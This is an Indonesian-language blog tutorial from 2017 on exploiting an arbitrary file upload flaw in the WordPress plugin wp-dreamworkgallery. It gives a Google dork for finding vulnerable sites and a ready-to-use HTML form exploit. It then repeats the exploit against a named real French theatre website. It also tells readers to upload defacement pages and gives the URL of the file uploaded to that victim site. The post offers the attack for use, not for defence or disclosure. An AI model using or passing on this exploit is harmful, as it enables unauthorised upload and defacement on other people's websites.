Author : UnknownTidak ada komentar
Halo Sobat Apakabar? Langsung menuju tutor..
Elu Langsung menuju ke google.
DORKs "inurl:/wp-content/plugins/wp-dreamworkgallery"
Pilih Salah Satu Website.
Copas Exploit ini di notepad lalu save ex. html :
<form action="http://www.target.com//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
www.target.com di isi sama web target... Contoh ini target gw
<form action="http://theatredumordant.fr//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>
Kayanya Shell ga bisa di upload di metode ini. jadi langsung aja upload file deface Elu. ex Html. Lalu submit.
Kalo Tampilan nya seperti itu biasanya vuln. Sekarang Cek file yg sudah kita upload tadi. Lihat gambar.. File ane ada di
/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html
Berarti begini http://theatredumordant.fr/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html
DEMO :
http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml
Artikel Terkait
Posted On : Rabu, 05 April 2017Time : April 05, 2017
